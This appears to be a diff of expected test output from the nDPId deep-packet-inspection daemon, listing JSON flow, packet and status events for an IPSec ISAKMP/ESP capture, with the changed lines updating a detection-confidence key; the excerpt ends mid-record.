+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":146,"packets-processed":145,"total-skipped-flows":0,"total-l4-payload-len":68780,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":8,"current-active-flows":2,"total-active-flows":6,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":946749778334} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778334,"flow_last_seen":946749778334,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946749778334,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946749778334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946749778334,"pkt":"eJS0JASgYDjgxTWgCABFAAMk5zNAAD8RZNnAqAJkbe27wikEAfQDEPyMUUmluBAEMEQAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEoKTmI3ubu6ZxWhplC\/I3GrOhdR2Ahrzg1cl5K7CGOqmD9LmmvBVQSrauKwYuvsfoAIPoWocHQoMo7f5ymv4IPWL+HbeAEosPePp10VCe7il3eMSwG\/INdrGrGu21qwlO\/+efSCGs3uGrG1SV6gA+E\/oPdzfBUNqf\/aMnkpkFwcKQAAJMgQNb6ePi189Vo1zI09B5mQSHqhnrJrpjWKCSmy16flKQAAHAAAQATK6hMad2HUkIE350RaQYXRyGPbFgAAABwAAEAFiTzfmy4vUiSu\/dsxMvaGgLvptZw="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778334,"flow_last_seen":946749778334,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946749778334,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778334,"flow_last_seen":946749778334,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946749778334,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946749778364,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946749778364,"pkt":"YDjgxTWgeJS0JASgCABFAABQyUgAAPcRDZht7bvCwKgCZAH0KQQAPBQcUUmluBAEMEQAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVgBk+LvIcxJJoE2awhA=="} 01517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946749778371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946749778371,"pkt":"eJS0JASgYDjgxTWgCABFAAM85zdAAD8RZL3AqAJkbe27wikEAfQDKIJdUUmluBAEMEQAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFVgBk+LvIcxJJoE2awhCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEoKTmI3ubu6ZxWhplC\/I3GrOhdR2Ahrzg1cl5K7CGOqmD9LmmvBVQSrauKwYuvsfoAIPoWocHQoMo7f5ymv4IPWL+HbeAEosPePp10VCe7il3eMSwG\/INdrGrGu21qwlO\/+efSCGs3uGrG1SV6gA+E\/oPdzfBUNqf\/aMnkpkFwcKQAAJMgQNb6ePi189Vo1zI09B5mQSHqhnrJrpjWKCSmy16flKQAAHAAAQATK6hMad2HUkIE350RaQYXRyGPbFgAAABwAAEAFiTzfmy4vUiSu\/dsxMvaGgLvptZw="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778420,"flow_last_seen":946749778420,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946749778420,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946749778420,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946749778420,"pkt":"eJS0JASgYDjgxTWgCABFAANM5zxAAD8RZKjAqAJkbe27wjikEZQDOErMAAAAAFFJpbgQBDBELFuvwAKAaBsuICMIAAAAAQAAAywjAAMQbA4QxmfNSp+fyUaP2skcxjhRyRA+Hy+nulOzx4seP\/VJbGCawiDcrcQc5QWGL3j\/WGmj93yDBSuy1WL7euil8k+L7Lh7IAx\/NEbTgeGj3cL+spCq6ZMgNKlhRmf6z4mQrPD29ZnJmLkBEmRQeomp2qPvmDIKkRMTrB2BfjuJ3YLSygMFLctsI7ggXNYV1Po\/4vPk4vVzDgwRrFqrW7KYrJLiAVN1hDJPr7Gy9kuPluJ8z8o2PofHRbWuScAYE0E+eb21tLzdgXQ3tKXX\/vpC+hFitQfjlOh5t9vsoEgIWNuITZ3lvptM6HOoSsn5dQw+XRBKZuJT7XF1A11+UL3jVX5RITf88G+Q7dv+tP6+TWskvGxDjrTTGXNofiTWyJ0w+3Fdae7fW2ijy34\/AL0iJMLvN1YPXO3N8vN5fGYPpypBTKw4V7xWeo3oBe0ejub4fmsULl2SoNBKg9VDPByKUUYEn50TQzW4BY7Z\/PTxzIQcPmN6aDEGl2ZTA47xO9I\/J4Zg4T43ce7SbxXpZ7f4uRctE9VnCWLMpGoVX9J+gc3pnlcwRtYfvwllyRptZ87skVsrIIvJBqDaL1f+oFz66PltKumOsgL0CivcQ6iqILl0OFgquRDBleUUEodHghaanDd7OmwElgTX2VD7RHoHmm5WDDXo2Tu35iL9ktdUtRy3n9bBpXgD1gXs8xWnOBYEH4muaXHxllxzh3KU+j1o1hssWvMNqfk3+UtFJIb0\/HFa7TC0KgAqPRF8BpMATPvlSferLmQOkCNvtSvw4LYOAPrld3EUDVStRHUbViInYZC1CTA15NkdRyFHZ1Vwqg\/6HJvl5DH8X0N95iuoDd+x3ONBHtR1y6njUd86stH8E\/t9P6ZXKzKVKC8e9b9G+9dCCwrRz4bWQMpH3mV9fTxYCVHXsaZR0xVSrKXIE6kZ\/XrBFCnbPiPXQkJKO4Nwn9bhYgongIZBMSUV9SDtmsnwsaLjW6NEYKhlmP3XJ287IRxrZ+3XDb9CCTOVdttWvgGvN5pdRZKp9jpIxrWW"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778420,"flow_last_seen":946749778420,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946749778420,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946749778420,"flow_last_seen":946749778420,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946749778420,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946749778561,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946749778561,"pkt":"YDjgxTWgeJS0JASgCABFAADsydYAAPcRDG5t7bvCwKgCZBGUOKQA2H8VAAAAAFFJpbgQBDBELFuvwAKAaBsuICMgAAAAAQAAAMwkAACw2vKDsI4WvCewQgUoU\/SKrFqCVUiKj1KKiDUx8Cqi9Zwcr5gbr2Mtoeu970bnlX31FD4v\/q7xpGL7dx9OD7xJZhwuc1Igl\/opndPG7\/EbMmU7b4lg00bORCDWSEUicP2p712CNcs8OyaUthH\/WyYO+D2i8bAigrbPmFCDIkhLbGRlEsDsQxrZRbqYVnxjaH3eSWftv0T1TsSVO3fOcXcaUJcQtsMqEfqp4CNimw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946749779105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946749779105,"pkt":"eJS0JASgYDjgxTWgCABFAACM501AAD8RZ1fAqAJkbe27wjikEZQAeG1BAAAAAFFJpbgQBDBELFuvwAKAaBsuICMIAAAAAgAAAGwwAABQGw+MmDcuV24HZanpawl3j\/i3cSl527taeiNa1LQV32lRXZkxAYiyvhFGbUNbtCFv+dhSQ2oZjW\/ai6sYO041xroOv3SvSK1vPWSgpA=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946748252067,"flow_last_seen":946748884718,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946748252067,"flow_last_seen":946748884718,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946749779886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":165,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":165,"packets-processed":164,"total-skipped-flows":0,"total-l4-payload-len":77624,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":8,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":62,"global_ts_msec":946750800427} -00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946749778334,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":184,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946749778334,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946750802633,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":188,"packets-processed":187,"total-skipped-flows":0,"total-l4-payload-len":88340,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":10,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":946752053636} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053636,"flow_last_seen":946752053636,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752053636,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946752053636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946752053636,"pkt":"eJS0JASgYDjgxTWgCABFAAMkWWVAAD8R8ojAqAJkbe274SkEAfQDENTXeUX3Y1A5a1kAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAALThkEvRFh99w4WJc3PWJxtg4Z5V\/W3ZXRxrm6NQH9u7KE06SIwEbersniw6hQWHyxhQ\/2rtv\/KS8MHCWu0\/UpEV6GCC8Jwl2D64n3IinW1UqpoDH3zgj5vP09DAsAYR\/lGdfNJjst9m4S0ICUVBjGwV2UlMv+ec0yUwblf\/QpdFKQAAJBN5hRLS4vKI93k9Qqglp8VdaUkpxICKhR0a7HBjyUJnKQAAHAAAQATaubyY8VWsI4Z6WQt6ODtfgtlAogAAABwAAEAFkYhaxcMPMkFLeVrj\/VCjsI8u34M="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053636,"flow_last_seen":946752053636,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752053636,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053636,"flow_last_seen":946752053636,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752053636,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946752053657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946752053657,"pkt":"YDjgxTWgeJS0JASgCABFAABQOHkAAPcRnkht7bvhwKgCZAH0KQQAPOJkeUX3Y1A5a1kAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE0tZBdGn8MHoQ9Q8GZvw=="} 01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946752053676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946752053676,"pkt":"eJS0JASgYDjgxTWgCABFAAM8WW9AAD8R8mbAqAJkbe274SkEAfQDKB4CeUX3Y1A5a1kAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAE0tZBdGn8MHoQ9Q8GZvyIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAALThkEvRFh99w4WJc3PWJxtg4Z5V\/W3ZXRxrm6NQH9u7KE06SIwEbersniw6hQWHyxhQ\/2rtv\/KS8MHCWu0\/UpEV6GCC8Jwl2D64n3IinW1UqpoDH3zgj5vP09DAsAYR\/lGdfNJjst9m4S0ICUVBjGwV2UlMv+ec0yUwblf\/QpdFKQAAJBN5hRLS4vKI93k9Qqglp8VdaUkpx